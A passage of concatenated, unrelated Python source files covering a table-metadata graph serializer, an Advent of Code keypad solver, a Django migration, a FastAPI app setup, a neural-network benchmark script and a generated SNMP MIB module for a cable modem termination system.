return TableMetadata.CLUSTER_KEY_FORMAT.format(db=self.database,
cluster=self.cluster)
def _get_schema_key(self) -> str:
return TableMetadata.SCHEMA_KEY_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema)
def _get_col_key(self, col: ColumnMetadata) -> str:
return ColumnMetadata.COLUMN_KEY_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name,
col=col.name)
def _get_col_description_key(self,
col: ColumnMetadata,
description: DescriptionMetadata) -> str:
return ColumnMetadata.COLUMN_DESCRIPTION_FORMAT.format(db=self.database,
cluster=self.cluster,
schema=self.schema,
tbl=self.name,
col=col.name,
description_id=description.get_description_id())
@staticmethod
def format_tags(tags: Union[List, str, None]) -> List:
if tags is None:
tags = []
if isinstance(tags, str):
tags = list(filter(None, tags.split(',')))
if isinstance(tags, list):
tags = [tag.lower().strip() for tag in tags]
return tags
def create_next_node(self) -> Union[Dict[str, Any], None]:
try:
return next(self._node_iterator)
except StopIteration:
return None
def _create_next_node(self) -> Iterator[Any]: # noqa: C901
table_node = {NODE_LABEL: TableMetadata.TABLE_NODE_LABEL,
NODE_KEY: self._get_table_key(),
TableMetadata.TABLE_NAME: self.name,
TableMetadata.IS_VIEW: self.is_view}
if self.attrs:
for k, v in self.attrs.items():
if k not in table_node:
table_node[k] = v
yield table_node
if self.description:
node_key = self._get_table_description_key(self.description)
yield self.description.get_node_dict(node_key)
# Create the table tag node
if self.tags:
for tag in self.tags:
yield TagMetadata.create_tag_node(tag)
for col in self.columns:
yield {
NODE_LABEL: ColumnMetadata.COLUMN_NODE_LABEL,
NODE_KEY: self._get_col_key(col),
ColumnMetadata.COLUMN_NAME: col.name,
ColumnMetadata.COLUMN_TYPE: col.type,
ColumnMetadata.COLUMN_ORDER: col.sort_order}
if col.description:
node_key = self._get_col_description_key(col, col.description)
yield col.description.get_node_dict(node_key)
if col.tags:
for tag in col.tags:
yield {NODE_LABEL: TagMetadata.TAG_NODE_LABEL,
NODE_KEY: TagMetadata.get_tag_key(tag),
TagMetadata.TAG_TYPE: 'default'}
# Database, cluster, schema
others = [NodeTuple(key=self._get_database_key(),
name=self.database,
label=TableMetadata.DATABASE_NODE_LABEL),
NodeTuple(key=self._get_cluster_key(),
name=self.cluster,
label=TableMetadata.CLUSTER_NODE_LABEL),
NodeTuple(key=self._get_schema_key(),
name=self.schema,
label=TableMetadata.SCHEMA_NODE_LABEL)
]
for node_tuple in others:
if node_tuple not in TableMetadata.serialized_nodes:
TableMetadata.serialized_nodes.add(node_tuple)
yield {
NODE_LABEL: node_tuple.label,
NODE_KEY: node_tuple.key,
'name': node_tuple.name
}
def create_next_relation(self) -> Union[Dict[str, Any], None]:
try:
return next(self._relation_iterator)
except StopIteration:
return None
def _create_next_relation(self) -> Iterator[Any]:
yield {
RELATION_START_LABEL: TableMetadata.SCHEMA_NODE_LABEL,
RELATION_END_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_START_KEY: self._get_schema_key(),
RELATION_END_KEY: self._get_table_key(),
RELATION_TYPE: TableMetadata.SCHEMA_TABLE_RELATION_TYPE,
RELATION_REVERSE_TYPE: TableMetadata.TABLE_SCHEMA_RELATION_TYPE
}
if self.description:
yield self.description.get_relation(TableMetadata.TABLE_NODE_LABEL,
self._get_table_key(),
self._get_table_description_key(self.description))
if self.tags:
for tag in self.tags:
yield {
RELATION_START_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_END_LABEL: TagMetadata.TAG_NODE_LABEL,
RELATION_START_KEY: self._get_table_key(),
RELATION_END_KEY: TagMetadata.get_tag_key(tag),
RELATION_TYPE: TableMetadata.TABLE_TAG_RELATION_TYPE,
RELATION_REVERSE_TYPE: TableMetadata.TAG_TABLE_RELATION_TYPE,
}
for col in self.columns:
yield {
RELATION_START_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_END_LABEL: ColumnMetadata.COLUMN_NODE_LABEL,
RELATION_START_KEY: self._get_table_key(),
RELATION_END_KEY: self._get_col_key(col),
RELATION_TYPE: TableMetadata.TABLE_COL_RELATION_TYPE,
RELATION_REVERSE_TYPE: TableMetadata.COL_TABLE_RELATION_TYPE
}
if col.description:
yield col.description.get_relation(ColumnMetadata.COLUMN_NODE_LABEL,
self._get_col_key(col),
self._get_col_description_key(col, col.description))
if col.tags:
for tag in col.tags:
yield {
RELATION_START_LABEL: TableMetadata.TABLE_NODE_LABEL,
RELATION_END_LABEL: TagMetadata.TAG_NODE_LABEL,
RELATION_START_KEY: self._get_table_key(),
RELATION_END_KEY: TagMetadata.get_tag_key(tag),
RELATION_TYPE: ColumnMetadata.COL_TAG_RELATION_TYPE,
RELATION_REVERSE_TYPE: ColumnMetadata.TAG_COL_RELATION_TYPE,
}
others = [
RelTuple(start_label=TableMetadata.DATABASE_NODE_LABEL,
end_label=TableMetadata.CLUSTER_NODE_LABEL,
start_key=self._get_database_key(),
end_key=self._get_cluster_key(),
type=TableMetadata.DATABASE_CLUSTER_RELATION_TYPE,
reverse_type=TableMetadata.CLUSTER_DATABASE_RELATION_TYPE),
RelTuple(start_label=TableMetadata.CLUSTER_NODE_LABEL,
end_label=TableMetadata.SCHEMA_NODE_LABEL,
start_key=self._get_cluster_key(),
end_key=self._get_schema_key(),
type=TableMetadata.CLUSTER_SCHEMA_RELATION_TYPE,
reverse_type=TableMetadata.SCHEMA_CLUSTER_RELATION_TYPE)
]
for rel_tuple in others:
if rel_tuple not in TableMetadata.serialized_rels:
TableMetadata.serialized_rels.add(rel_tuple)
yield {
RELATION_START_LABEL: rel_tuple.start_label,
RELATION_END_LABEL: rel_tuple.end_label,
RELATION_START_KEY: rel_tuple.start_key,
RELATION_END_KEY: rel_tuple.end_key,
RELATION_TYPE: rel_tuple.type,
RELATION_REVERSE_TYPE: rel_tuple.reverse_type
}
|
py | 7dfacb791f5c44bfb9615a7325406b4385c0d414 | class Keypad:
def __init__(self, start=5):
"""Set the number of the keypad to start on."""
self.position = start
self.above = {1: 1, 2: 2, 3: 1, 4: 4, 5: 5, 6: 2, 7: 3, 8: 4, 9: 9,
'A': 6, 'B': 7, 'C': 8, 'D': 'B'}
self.below = {1: 3, 2: 6, 3: 7, 4: 8, 5: 5, 6: 'A', 7: 'B', 8: 'C',
9: 9, 'A': 'A', 'B': 'D', 'C': 'C', 'D': 'D'}
self.onRight = {1: 1, 2: 3, 3: 4, 4: 4, 5: 6, 6: 7, 7: 8, 8: 9, 9: 9,
'A': 'B', 'B': 'C', 'C': 'C', 'D': 'D'}
self.onLeft = {1: 1, 2: 2, 3: 2, 4: 3, 5: 5, 6: 5, 7: 6, 8: 7, 9: 8,
'A': 'A', 'B': 'A', 'C': 'B', 'D': 'D'}
def up(self):
"""Move position up."""
self.position = self.above[self.position]
def down(self):
"""Move position down."""
self.position = self.below[self.position]
def right(self):
"""Move position right."""
self.position = self.onRight[self.position]
def left(self):
"""Move position left."""
self.position = self.onLeft[self.position]
def move(self, dir):
"""Move the position of your finger."""
if dir.upper() == 'U':
self.up()
if dir.upper() == 'D':
self.down()
if dir.upper() == 'R':
self.right()
if dir.upper() == 'L':
self.left()
def getPos(self):
"""Return your fingers position."""
return self.position
def main():
"""Run main function."""
keypad = Keypad()
code = []
with open('data/day2data.txt', 'r') as f:
moveList = f.readlines()
for line in moveList:
line.split()
for move in line:
keypad.move(move)
code.append(keypad.getPos())
print('Your bathroom access code is: {}').format(code)
if __name__ == '__main__':
main()
|
py | 7dfacb89ad7323ebea4d85962bc26d4fc98125bf | # Generated by Django 2.2 on 2019-04-30 11:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("motions", "0024_state_restriction_3")]
operations = [
migrations.AddField(
model_name="motion",
name="category_weight",
field=models.IntegerField(default=10000),
)
]
|
py | 7dfacc839ead2e02d4ed30f2afe70d302068aa8b | from fastapi import FastAPI
from fastapi.responses import JSONResponse
from app.api.routers import users
from app.api.routers import permissions
from app.api.routers import notes
from app.api.routers import user_groups
from app.config import settings
from app.errors.api import ApiError, UnknownApiError
tags_metadata = [
{
"name": "auth",
"description": "Authenticate operations"
},
{
"name": "admin",
"description": "Admin operations"
},
{
"name": "users",
"description": "Operations with users"
},
{
"name": "notes",
"description": "Operation with notes"
},
]
app = FastAPI(
title=settings.APP_NAME,
description="This is a sas-kodzi project, with auto docs for the API and everything",
version="0.2.0",
openapi_tags=tags_metadata
)
app.include_router(users.router)
app.include_router(user_groups.router)
app.include_router(permissions.router)
app.include_router(notes.router)
# todo: log requests in error handlers -> read about fast api logging first
# noinspection PyUnusedLocal
@app.exception_handler(ApiError)
def handle_api_error(request, error: ApiError):
"""
Api error handler.
todo: how to utilize request ? -> error logging ???
"""
return JSONResponse(
status_code=error.status_code,
content={'message': error.error_message.message}
)
# noinspection PyUnusedLocal
@app.exception_handler(Exception)
def handle_unknown_api_error(request, exception: Exception):
"""
Unknown Api error handler 500 - bug :(
"""
error = UnknownApiError(f'{exception.__class__.__name__} - {str(exception)}')
return JSONResponse(
status_code=error.status_code,
content={'message': error.error_message.message}
)
|
py | 7dfacc9abf1065e3a06cecd88c2211e284e8cd33 | # coding: utf-8
import chainer
def h(x, y):
return x + y + y + y |
py | 7dfacca23d6b2815f09226a6534fd3ce225def7f | # -*- coding: utf-8 -*-
"""
@date: 2020/11/4 下午2:06
@file: benchmarks.py
@author: zj
@description:
"""
import time
import numpy as np
import torch
from zcls.util.metrics import compute_num_flops
from zcls.config import get_cfg_defaults
from zcls.model.recognizers.build import build_recognizer
def compute_model_time(data_shape, model, device):
model = model.to(device)
t1 = 0.0
num = 100
begin = time.time()
for i in range(num):
data = torch.randn(data_shape)
start = time.time()
model(data.to(device=device, non_blocking=True))
if i > num // 2:
t1 += time.time() - start
t2 = time.time() - begin
print(f'one process need {t2 / num:.3f}s, model compute need: {t1 / (num // 2):.3f}s')
def main(data_shape, config_file, mobile_name):
cfg = get_cfg_defaults()
cfg.merge_from_file(config_file)
np.random.seed(cfg.RNG_SEED)
torch.manual_seed(cfg.RNG_SEED)
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.benchmark = True
# gpu_device = torch.device('cuda:0')
cpu_device = torch.device('cpu')
model = build_recognizer(cfg, cpu_device)
model.eval()
data = torch.randn(data_shape).to(device=cpu_device, non_blocking=True)
GFlops, params_size = compute_num_flops(model, data)
print(f'{mobile_name} ' + '*' * 10)
print(f'device: {cpu_device}')
print(f'GFlops: {GFlops:.3f}G')
print(f'Params Size: {params_size:.3f}MB')
model = build_recognizer(cfg, cpu_device)
model.eval()
print(f'compute cpu infer time')
compute_model_time(data_shape, model, cpu_device)
# print(f'compute gpu infer time')
# compute_model_time(data_shape, model, gpu_device)
del model
torch.cuda.empty_cache()
def mobilenet():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/mobilenet/mobilenet_v3_large_x1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mobilenet_v3_small_x1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_0_5_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_0_5_zcls_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mnasnet_b1_1_0_zcls_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mobilenet_v2_torchvision_imagenet_224.yaml',
'configs/benchmarks/mobilenet/mobilenet_v2_zcls_imagenet_224.yaml',
]
name_list = [
'mobilenet_v3_large_x1_0',
'mobilenet_v3_small_x1_0',
'mnasnet_b1_0_5_torchvision',
'mnasnet_b1_0_5_zcls',
'mnasnet_b1_1_0_torchvision',
'mnasnet_b1_1_0_zcls',
'mobilenet_v2_torchvision',
'mobilenet_v2_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def shufflenet_v1():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/shufflenet/shufflenet_v1_3g0_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_3g1_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_3g1x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_3g2x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g0_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g1_5x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g1x_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v1_8g2x_zcls_imagenet_224.yaml',
]
name_list = [
'shufflenet_v1_3g0_5x_zcls',
'shufflenet_v1_3g1_5x_zcls',
'shufflenet_v1_3g1x_zcls',
'shufflenet_v1_3g2x_zcls',
'shufflenet_v1_8g0_5x_zcls',
'shufflenet_v1_8g1_5x_zcls',
'shufflenet_v1_8g1x_zcls',
'shufflenet_v1_8g2x_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def shufflenet_v2():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/shufflenet/shufflenet_v2_x0_5_torchvision_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x0_5_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x1_0_torchvision_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x1_0_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x1_5_zcls_imagenet_224.yaml',
'configs/benchmarks/shufflenet/shufflenet_v2_x2_0_zcls_imagenet_224.yaml',
]
name_list = [
'shufflenet_v2_x0_5_torchvision',
'shufflenet_v2_x0_5_zcls',
'shufflenet_v2_x1_0_torchvision',
'shufflenet_v2_x1_0_zcls',
'shufflenet_v2_x1_5_zcls',
'shufflenet_v2_x2_0_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def resnet():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/resnet/r18_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r18_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r34_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r34_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r50_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r101_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r101_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/r152_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/r152_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt50_32x4d_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt50_32x4d_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt101_32x8d_torchvision_imagenet_224.yaml',
'configs/benchmarks/resnet/rxt101_32x8d_zcls_imagenet_224.yaml',
]
name_list = [
'r18_torchvision',
'r18_zcls',
'r34_torchvision',
'r34_zcls',
'r50_torchvision',
'r50_zcls',
'r101_torchvision',
'r101_zcls',
'r152_torchvision',
'r152_zcls',
'rxt50_32x4d_torchvision',
'rxt50_32x4d_zcls',
'rxt101_32x8d_torchvision',
'rxt101_32x8d_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def repvgg():
cfg_file_list = [
'configs/benchmarks/repvgg/repvgg_a0_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a0_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a1_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a1_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a2_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_a2_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b0_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b0_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g2_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g2_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g4_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b1g4_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2g4_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b2g4_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_infer_zcls_imagenet_320.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_b3g4_train_zcls_imagenet_320.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_infer_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_infer_zcls_imagenet_320.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_train_zcls_imagenet_224.yaml',
'configs/benchmarks/repvgg/repvgg_d2se_train_zcls_imagenet_320.yaml',
]
name_list = [
'repvgg_a0_infer_zcls',
'repvgg_a0_train_zcls',
'repvgg_a1_infer_zcls',
'repvgg_a1_train_zcls',
'repvgg_a2_infer_zcls',
'repvgg_a2_train_zcls',
'repvgg_b0_infer_zcls',
'repvgg_b0_train_zcls',
'repvgg_b1_infer_zcls',
'repvgg_b1_train_zcls',
'repvgg_b1g2_infer_zcls',
'repvgg_b1g2_train_zcls',
'repvgg_b1g4_infer_zcls',
'repvgg_b1g4_train_zcls',
'repvgg_b2_infer_zcls',
'repvgg_b2_train_zcls',
'repvgg_b2g4_infer_zcls',
'repvgg_b2g4_train_zcls',
'repvgg_b3_infer_zcls',
'repvgg_b3_train_zcls',
'repvgg_b3g4_infer_zcls_224',
'repvgg_b3g4_infer_zcls_320',
'repvgg_b3g4_train_zcls_224',
'repvgg_b3g4_train_zcls_320',
'repvgg_d2se_infer_zcls_224',
'repvgg_d2se_infer_zcls_320',
'repvgg_d2se_train_zcls_224',
'repvgg_d2se_train_zcls_320',
]
# print(len(name_list), len(cfg_file_list))
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
if '224' in cfg_file:
data_shape = (1, 3, 224, 224)
main(data_shape, cfg_file, name)
elif '320' in cfg_file:
data_shape = (1, 3, 320, 320)
main(data_shape, cfg_file, name)
else:
raise ValueError('ERROR')
def senet_sknet_resnest():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/resnet/se_r50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/sknet50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_fast_2s1x64d_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_fast_2s1x64d_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest50_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest101_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest101_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest200_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest200_official_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest269_zcls_imagenet_224.yaml',
'configs/benchmarks/resnet/resnest269_official_imagenet_224.yaml',
]
name_list = [
'se_r50_zcls_imagenet',
'sknet50_zcls_imagenet',
'resnest50_fast_2s1x64d_zcls',
'resnest50_fast_2s1x64d_official',
'resnest50_zcls',
'resnest50_official',
'resnest101_zcls',
'resnest101_official',
'resnest200_zcls',
'resnest200_official',
'resnest269_zcls',
'resnest269_official',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
def ghostnet():
data_shape = (1, 3, 224, 224)
cfg_file_list = [
'configs/benchmarks/ghostnet/ghostnet_x1_0_zcls_imagenet_224.yaml',
]
name_list = [
'ghostnet_x1_0_zcls',
]
assert len(name_list) == len(cfg_file_list)
for name, cfg_file in zip(name_list, cfg_file_list):
main(data_shape, cfg_file, name)
if __name__ == '__main__':
print('#' * 30)
mobilenet()
# print('#' * 30)
# shufflenet_v1()
# shufflenet_v2()
# print('#' * 30)
# resnet()
# print('#' * 30)
# repvgg()
# print('#' * 30)
# senet_sknet_resnest()
# print('#' * 30)
# ghostnet()
|
py | 7dface4af894fc23f137a8104e3139903cd390d7 | #
# PySNMP MIB module CADANT-CMTS-MAC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CADANT-CMTS-MAC-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:27:15 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection")
CerOfdmModBitsType, OfdmProfileId = mibBuilder.importSymbols("CADANT-CMTS-DOWNCHANNEL-MIB", "CerOfdmModBitsType", "OfdmProfileId")
cadMacChlChannelIfIndex, cadIfMacDomainIfIndex = mibBuilder.importSymbols("CADANT-CMTS-LAYER2CMTS-MIB", "cadMacChlChannelIfIndex", "cadIfMacDomainIfIndex")
cadLayer2, = mibBuilder.importSymbols("CADANT-PRODUCTS-MIB", "cadLayer2")
CadCpeDeviceTypes, OUIAddress, InetAddressIPv4or6 = mibBuilder.importSymbols("CADANT-TC", "CadCpeDeviceTypes", "OUIAddress", "InetAddressIPv4or6")
TenthdB, DocsisQosVersion, DocsisUpstreamType, DocsisVersion, TenthdBmV = mibBuilder.importSymbols("DOCS-IF-MIB", "TenthdB", "DocsisQosVersion", "DocsisUpstreamType", "DocsisVersion", "TenthdBmV")
ChSetId, RcpId, IfDirection = mibBuilder.importSymbols("DOCS-IF3-MIB", "ChSetId", "RcpId", "IfDirection")
docsQosServiceFlowSidClusterId, docsQosServiceClassEntry, BitRate, docsQosServiceFlowId = mibBuilder.importSymbols("DOCS-QOS3-MIB", "docsQosServiceFlowSidClusterId", "docsQosServiceClassEntry", "BitRate", "docsQosServiceFlowId")
InterfaceIndex, ifIndex, InterfaceIndexOrZero = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex", "ifIndex", "InterfaceIndexOrZero")
InetAddressIPv4, InetAddressIPv6, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddressIPv4", "InetAddressIPv6", "InetAddressType")
ipNetToMediaEntry, = mibBuilder.importSymbols("IP-MIB", "ipNetToMediaEntry")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Unsigned32, iso, Bits, TimeTicks, Gauge32, MibIdentifier, NotificationType, IpAddress, Counter32, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, ModuleIdentity, Counter64, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Unsigned32", "iso", "Bits", "TimeTicks", "Gauge32", "MibIdentifier", "NotificationType", "IpAddress", "Counter32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "ModuleIdentity", "Counter64", "ObjectIdentity")
DisplayString, RowStatus, MacAddress, TruthValue, DateAndTime, TextualConvention, TimeStamp = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "MacAddress", "TruthValue", "DateAndTime", "TextualConvention", "TimeStamp")
cadMacMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2))
cadMacMib.setRevisions(('2015-09-08 00:00', '2015-06-05 00:00', '2015-04-14 00:00', '2015-04-06 00:00', '2015-04-01 00:00', '2015-03-03 00:00', '2014-11-25 00:00', '2014-09-23 00:00', '2014-05-31 00:00', '2014-02-13 00:00', '2013-06-20 00:00', '2013-06-12 00:00', '2013-05-14 00:00', '2013-05-09 00:00', '2013-04-29 00:00', '2012-11-30 00:00', '2012-11-26 00:00', '2012-08-01 00:00', '2012-06-27 00:00', '2011-05-05 00:00', '2010-11-23 00:00', '2010-10-12 00:00', '2010-08-31 00:00', '2010-05-24 00:00', '2010-05-13 00:00', '2010-02-08 00:00', '2009-08-26 00:00', '2009-08-19 00:00', '2009-04-08 00:00', '2009-03-25 00:00', '2009-03-04 00:00', '2009-02-12 00:00', '2009-01-26 00:00', '2009-01-05 00:00', '2008-11-17 00:00', '2008-02-01 00:00', '2007-09-06 00:00', '2007-08-30 00:00', '2007-08-08 00:00', '2006-09-19 00:00', '2006-09-12 00:00', '2006-08-11 00:00', '2006-07-17 00:00', '2006-04-06 00:00', '2006-01-30 00:00', '2006-01-05 00:00', '2006-01-03 00:00', '2005-12-12 00:00', '2005-10-19 00:00', '2005-10-18 00:00', '2005-10-14 00:00', '2005-10-07 00:00', '2005-10-05 00:00', '2005-10-03 00:00', '2005-08-10 00:00', '2005-07-11 00:00', '2005-07-01 00:00', '2004-12-03 00:00', '2004-11-12 00:00', '2004-02-28 00:00', '2003-10-16 00:00', '2003-09-24 00:00', '2003-07-29 00:00', '2003-06-23 00:00', '2003-06-20 00:00', '2003-04-14 00:00', '2003-01-06 00:00', '2002-11-11 00:00', '2002-10-10 00:00', '2002-09-23 00:00', '2002-09-19 00:00', '2002-08-28 00:00', '2002-06-05 00:00', '2001-05-22 00:00', '2001-05-03 00:00', '2001-04-03 00:00', '2001-02-05 00:00', '2000-09-24 00:00',))
if mibBuilder.loadTexts: cadMacMib.setLastUpdated('201509080000Z')
if mibBuilder.loadTexts: cadMacMib.setOrganization('Arris Group, Inc.')
class CadIfCmtsCmStatusType(TextualConvention, Integer32):
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 20))
namedValues = NamedValues(("other", 1), ("ranging", 2), ("rangingAborted", 3), ("rangingComplete", 4), ("ipComplete", 5), ("registrationComplete", 6), ("accessDenied", 7), ("operational", 8), ("registeredBPIInitializing", 9), ("startEae", 10), ("startDhcpv4", 11), ("startDhcpv6", 12), ("dhcpv6Complete", 13), ("startConfigFileDownload", 14), ("configFileComplete", 15), ("forwardingDisabled", 17), ("rfMuteAll", 18), ("netAccessDisabled", 20))
cadIfCmtsCmStatusNumber = MibScalar((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusNumber.setStatus('current')
cadIfCmtsCmStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2), )
if mibBuilder.loadTexts: cadIfCmtsCmStatusTable.setStatus('current')
cadIfCmtsCmStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"))
if mibBuilder.loadTexts: cadIfCmtsCmStatusEntry.setStatus('current')
cadIfCmtsCmStatusMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 2), MacAddress())
if mibBuilder.loadTexts: cadIfCmtsCmStatusMacAddress.setStatus('current')
cadIfCmtsCmStatusDownChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 4), InterfaceIndexOrZero()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDownChannelIfIndex.setStatus('current')
cadIfCmtsCmStatusUpChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 5), InterfaceIndexOrZero()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusUpChannelIfIndex.setStatus('current')
cadIfCmtsCmStatusValue = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 9), CadIfCmtsCmStatusType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusValue.setStatus('current')
